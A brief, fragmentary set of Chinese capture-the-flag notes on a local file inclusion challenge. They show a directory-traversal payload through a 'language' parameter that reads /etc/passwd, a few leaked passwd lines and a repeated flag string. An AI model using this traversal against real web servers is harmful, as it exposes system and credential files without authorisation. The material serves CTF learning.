和baby lfi 一样的方法
shellmates{yOU_M4De_yOUr_waY_7hRough_iT}
/index.php?language=./languages/../../../../etc/passwd
这脑洞也太大了吧
?language=./languages/../../../../../etc/passwd shellmates{yOU_M4De_yOUr_waY_7hRough_iT}
shellmates{yOU_M4De_yOUr_waY_7hRough_iT}
下面解析的链接挂了,大概就是后台会验证是不是在当前language目录下,但是没有验证后面../的目录穿越,所以先输入./language/
Half the truth is often a big lie:Look Here !!! root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin
这篇思路解释的挺详细 http://t.csdnimg.cn/sIZDF
./language/../../../../../etc/passwd